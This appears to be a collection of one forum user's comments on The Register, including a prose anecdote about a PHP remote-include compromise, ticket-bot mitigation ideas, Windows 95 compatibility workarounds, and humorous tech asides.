450 posts • joined 26 Jan 2011
"any interruption of service would not materially impact internet traffic".
I could use this in my customer service notices. This is absolutely awesome:
"This total interruption of service does not materially impact the use of your product, and does not affect our 99.999ggg9% uptime sla guarantee.
As such, please don't ask our sales team for service credit as your services are not materially impacted even if they are. You Have Been Told.
Your Beloved and All-Knowing Support Team".
A theory, with first a backstory about botnets.
In 2006 I designed and delivered as a one man band freelance engineer, an online selling site for a toy company, all built from scratch. I did my best for mitigating any attacks, injections, account security, hashing and seeding password details, even wrote some big fixes for a major bank’s online credit card processing library.
I got a request for a last minute change to add shop details so that someone could find their closest shop, with photo and contact details. A quick change where the shop name was passed in the url, this argument was parsed, checked that it was not attempting to get out of its root directory (in the end, not well enough), then this argument was used to run an include of $shopname.inc, and that would be rendered to the shop details page. This ran without fault for months.
So, one day the site started running slow. Ssh’d into the box, ps aux showed 2 perl scripts running from /tmp, taking up 98% cpu. Killed the processes, archived the files, rebooted as single user and archived the logs , ran several malware checks , ended up reimaging the server and restoring the site from cold backup to be sure.
After 2 days of log analysis, looking how the box was pwned. I ended up finding in the apache logs thousands of scans attempting to exploit known issues in known web apps and web servers. All ended with a server error as I was not running those apps or servers (server says apache, runs on Linux, lets run IIS attacks to get to the servers c drive...) - except one, from memory somthing like scan 2400 out of 6000, a direct access to one specific page on my site, no poking around to see what worked, no plugging random values seeing how the server responded, just one single bang to one direct page, all needed values present plus one ‘unexpected’ informing php to include the remote payload.
So. Rookie mistake, not realising that include() was not just a local include.
What got me was that somebody had checked the site, understood how the system went together , and crafted a tailored specific attack for a specific page on this, low volume totally bespoke closed source website, not used anywhere else on the net.
I never did find any details in the available logs on how somebody poked around and identified the pages to include, so it happened over a month before, then was released and that scan was being used in a script kiddies automated attack package, my bug was being searched on millions of servers around the net.
So, somebody took the time to look up the server, find a vulnerability, even if it was simple you needed to check and test first, design the attack and package that in with a list of others, then run the attacks, running from what I could discover ddos and sending spam.
I was amazed that someone took the time to find a one off vuln in a one off app, on one server so they could pwn it, and was running the same attack on other servers around the world.
Fast forward 8 years, ticket bots are on the rise when I first heard about the problem.
My theory is that some guy who was dedicated enough to do major analysis work to grab a fistful of dollars sending viagra spam on pa couple of thousand pwned servers has levelled up, and putting their ressources into reverse engineering ticket sites, custom matrixes to be able to get in, get around captchas and work on seat allocation.
Sell one inflated ticket and you have made 10 times more than you would ever have done pumping a few million spam emails from your botnet. Sell a thousand tickets and you are laughing. And far more legal than overt hacking. Less pain more gain.
So, how to mitigate ? Ip range restrictions from the major bitbarns à la BBC iPlayer ? It would probably slow the automated scrapes. Better captchas would be good too, but would still be vulnerable to wetware hacking from a Bangladeshi sweatshop, paid a few cents per form filled, add some geo restrictions, order limitations per ip, should go some way to limit the fake purchases. Ticket naming, proof of ID with reimbursement but no exchange/resale would be the cherry topping.
But are the ticket selling sites interested in doing this or are they just doing a ‘don’t care got paid’ customer service model...?
Because all the cool kids did it back in the day probably. Thanks Lotus.
I will admit that from a VB point of view, the access you can still get into office apps is awesome if you need it, but vba automation is such a niche market, it can only be a fraction of a percent of the use base.
The fraction of a percent of skint teenagers leaning to program vb in the nineties will thank MS for embedding VB6 IDE into office tools that only cost a quarter of the official product :)
I cannot find the intial technical article, probably long gone and/or buried in one of Microsoft's blogs, but I did dig up these three, talking about the Windows 95 era:
- Windows 95 detected if SimCity was running, and then ran the memory allocator in SimCity compatibility mode to ensure that the app did not crash the protected memory model due to a memory allocation bug in the game: https://www.joelonsoftware.com/2000/05/24/strategy-letter-ii-chicken-and-egg-problems/
- Why Windows 95 never displayed a compatibility error to request an upgrade for this: https://blogs.msdn.microsoft.com/oldnewthing/20050728-16/?p=34783
- Windows 95 shipped without a laptop battery power limitation trick because specific laptops from a specific big name manufacturer at the time would lock up if you used it (and also another system would crash if your graphics card was too far away from the power supply on the local bus): https://blogs.msdn.microsoft.com/oldnewthing/20030828-00/?p=42753
For these cases, the issue was that there was software and hardware with known faults that would bring down the system, and in general the customer experience would be "this bloody operating system is so crap, it can't even run apps that it used to run before the upgrade"... and given that when '95 came out, internet was in it's infancy, telling a client to "navigage" to a "website" and "download" a "patch" would incomprehensible be for the vast majority of users at that time, who went out to real physical shops and bought software on diskettes and CD's. Remember this was the time when Windows 95 was sold on a ton of diskettes (between 13 and 40 depending on your release version), so finding that there may have been a windows bug - or a discovered undocumented feature - that allowed some software to possibly do somthing that worked could well have been broken after a bugfix or a change in the internal API's, bringing down the app that used or exploited it, and again, this would be taken as Microsoft's fault because their working game broke, when actually it could be the game playing fast and loose with the specs, and now Microsoft wants that module (which could be a common module used across several game engines) to be fixed to avoid the hassle of SimCity hacks in the kernel, especially now that everyone has Internet, and these patches can be distributed as and when needed, avoiding Windows having to develop nasty compatibility workarounds.
Well, this is also the great thing with English having mostly neutral nouns , and when there are male of female ones it is either implicit (ship is a “she” by convention in English, but “he” in French and Russian for example), so the translation needs to make some guesswork to Identify from a neutral noun to guess the one you want.
So, “i talked to the nurse today” becomes “j'ai parlé à l'infirmière aujourd'hui”, but if you specify “i talked to the male nurse today”, it does change to the male sentence “j'ai parlé à l'infirmier aujourd'hui”, so you can overrule it if you need to by being explicit.
Starting with the page code that can be helped with HTTP compression options, but then you get the images, which may not be much (though i've seen too many 4 meg jpeg's being forced down to 200 x 300 pixel window), then you add a couple of hundred kb of minified jquery, then a gazillion js includes for all the tracking and stats libraries under the sun, plus google tag library as someone has realised that their website is so locked down that the only way they can publish content to their own website is using an external system, chewing through your data package....only finally after 2 seconds to run about 10 redirects to tell you that you are the billionth visitor to this website and you have won a free copy of viking nazi zombies rape and pilliage if you click here and subscribe to a 50 quid a week game plan, and cannot get back to the actual bloody content you wanted to read in the first place...
Yep, the web has come a long way since when I started in 1994. Get off my lawn and take your fucking fake arsed download buttons and autoplay video ads with you.
Mine's the one with my mate's diskette of racey animated GIF's in the pocket.. I swear it's my mates. I'd never look at such stuff, of course.
Would not whispering directly into Alexa somthng along the lines of ordering sex toys or a 55 gallon drum of anal lube when the host was out fixing drinks not give them the message that an always on listening device linked into the online tat bazaar is not a good idea? You can always protest that the think must have been mis-listening to your conversation...
After being an IE fanboy for years due to Firefox becoming a memory hogging monster , Chrome was a big surprise and I jumped on it in a big way, but the increasing data slurp, memory issues, lack of flexibility in declaring internal sites as trusted and save, I ended up a couple of months ago trying out Firefox again, and was pleasantly surprised. I did have a moment of doubt when I got a notification that firebug was going to have issues but the built in tools were good. I am now only using FF and happy with it.
Your fathers source code was committed to your mothers repo, and merged with hers, then was managed and developed further by her until you arrived as a 1.0 release about 9 months later (or possibly public beta if the product was delivered early but unfinished and asking the community for assistance to complete the product. Which raises some ethical questions about your public licence...
So, aside from the initial commit and merge, all the development into a viable product was done by yo moma, so I would say she is responsible for the original work and holds the copyright and enforced her legal ownership until copyright expiration after between the legal 18 and 21 years expiration date!
Difficult really, as Dabbsy is here once a week, and Simon about twice a year...
Then again, I did notice that Alistair seems to have been getting his inspiration from somewhere in his recent articles. We will know when we see the article about the client getting pushed down the stairs, stuck in a lift over a long weekend or getting home-made ECT in the unlit underground car park...
Biting the hand that feeds IT © 1998–2019